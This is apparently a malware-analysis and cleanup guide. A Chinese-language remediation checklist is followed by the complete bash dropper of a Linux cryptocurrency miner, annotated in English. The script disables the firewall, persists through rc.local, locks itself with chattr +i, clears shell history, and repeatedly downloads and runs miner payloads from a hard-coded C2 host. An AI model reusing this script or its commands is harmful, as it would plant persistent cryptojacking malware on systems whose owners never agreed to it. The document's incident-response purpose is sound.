Linux 服务器感染了挖矿木马，其启动/守护脚本内容如下，请对照脚本内容逐项清理。清理顺序很重要：先结束脚本本身（由 /etc/rc.local 中的 `sh /tmp/XMRSH &` 拉起）以及 `/tmp/zlkjsdn`、`/tmp/xmrminer` 进程，否则脚本每 600 秒会重新下载并重新启动它们；其中 /tmp/XMRSH 被脚本加了不可变属性，需先执行 `chattr -i /tmp/XMRSH` 才能删除，否则删不掉。随后删除 /tmp/zlkjsdn、/tmp/xmrminer、/tmp/config.json，删除 /etc/rc.local 中被追加的三行，检查 /usr/bin 下被改名的 scet、cuy、Tyrant、Tyrantc（wget/curl 的副本），在防火墙上封禁 C2 地址 118.184.61.208（脚本通过 TCP/22 上的明文 HTTP 下载载荷），并重新启用被脚本关闭的 iptables 服务。
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# by:Tyrant
# 2015-02-12
# --- Analyst annotations: dropper / persistence stage of the miner. ---
# Disable the host firewall service; output is discarded and it is backgrounded
# so a missing or failing service does not stall the script.
service iptables stop > /dev/null 2>&1 &
# Restore wget/curl from copies hidden under other names in /usr/bin. The
# operator presumably stashed them there earlier; if both source names exist
# the second mv overwrites the first. Cleanup indicator: look for /usr/bin/scet,
# /usr/bin/cuy, /usr/bin/Tyrant and /usr/bin/Tyrantc.
mv /usr/bin/scet /usr/bin/wget
mv /usr/bin/cuy /usr/bin/curl
mv /usr/bin/Tyrant /usr/bin/wget
mv /usr/bin/Tyrantc /usr/bin/curl
# Boot persistence via /etc/rc.local. The entry is only treated as present when
# the grep output is exactly "sh /tmp/XMRSH &"; any other line mentioning
# /tmp/XMRSH makes the comparison fail and the three lines are appended again.
# /tmp/XMRSH is presumably this script itself (inferred from the rc.local entry).
if [ "sh /tmp/XMRSH &" = "$(cat /etc/rc.local | grep /tmp/XMRSH | grep -v grep)" ]; then
echo ""
else
echo "sh /tmp/XMRSH &" >> /etc/rc.local
echo "nohup /tmp/xmrminer > /dev/null 2>&1 &" >> /etc/rc.local
echo "nohup /tmp/zlkjsdn > /dev/null 2>&1 &" >> /etc/rc.local
fi
# Make the script immutable so rm/mv on it fail; remediation must run
# `chattr -i /tmp/XMRSH` before the file can be deleted.
chattr +i /tmp/XMRSH
# --- Watchdog loop: every 600 s (re)downloads and (re)starts the two payloads
# and keeps exactly one instance of each alive. Killing the payloads without
# first stopping this loop (and the rc.local entry) only buys ten minutes. ---
while [ 1 ]; do
# Number of ps entries mentioning /tmp/zlkjsdn ("grep -v grep" drops the grep itself).
Centos_sshd_killn=$(ps aux | grep "/tmp/zlkjsdn" | grep -v grep | wc -l)
if [[ $Centos_sshd_killn -eq 0 ]]; then
# Payload not running: fetch it if the file is gone. The download only happens
# when /usr/bin/wget exists (the curl calls sit inside the same branch). The C2
# serves plain HTTP on TCP/22, presumably to blend in with SSH traffic. A copy
# of wget is made in the current working directory and removed afterwards.
# No download result is checked: chmod and launch run even if the fetch failed.
if [ ! -f "/tmp/zlkjsdn" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
./wget -O /tmp/zlkjsdn http://118.184.61.208:22/xmr/zlkjsdn &> /dev/null
./wget -O /tmp/config.json http://118.184.61.208:22/xmr/config.json &> /dev/null
curl -o /tmp/zlkjsdn http://118.184.61.208:22/xmr/zlkjsdn
curl -o /tmp/config.json http://118.184.61.208:22/xmr/config.json
rm wget -rf
else
echo "No wget"
fi
fi
chmod +x /tmp/zlkjsdn
chmod +x /tmp/config.json
nohup /tmp/zlkjsdn > /dev/null 2>&1 &
# Clears this shell's in-memory history list; in a non-interactive script this
# has little practical effect and is likely intended as anti-forensics.
history -c
elif [[ $Centos_sshd_killn -gt 1 ]]; then
# More than one instance: SIGKILL all but one. The counter is decremented per
# pid; the entry reached when it hits 1 is skipped, every other entry is
# killed. Note this ps filter ("zlkjsdn") is broader than the one used for the
# count above ("/tmp/zlkjsdn").
for killed in $(ps aux | grep "zlkjsdn" | grep -v grep | awk '{print $2}'); do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[ $Centos_sshd_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
# Same watchdog for the second payload, /tmp/xmrminer. Differences: config.json
# is not re-fetched here, and the binary is started with a bare "&" (no nohup,
# stdout/stderr not redirected).
Centos_ssh_killn=$(ps aux | grep "/tmp/xmrminer" | grep -v grep | wc -l)
if [[ $Centos_ssh_killn -eq 0 ]]; then
if [ ! -f "/tmp/xmrminer" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
./wget -O /tmp/xmrminer http://118.184.61.208:22/xmr/xmrminer &> /dev/null
curl -o /tmp/xmrminer http://118.184.61.208:22/xmr/xmrminer
rm wget -rf
else
echo "No wget"
fi
fi
chmod +x /tmp/xmrminer
/tmp/xmrminer &
history -c
elif [[ $Centos_ssh_killn -gt 1 ]]; then
# Same "leave one, SIGKILL the rest" logic as above, filtering on "xmrminer".
for killed in $(ps aux | grep "xmrminer" | grep -v grep | awk '{print $2}'); do
Centos_ssh_killn=$(($Centos_ssh_killn-1))
if [[ $Centos_ssh_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
# Pause ten minutes before the next check.
sleep 600
done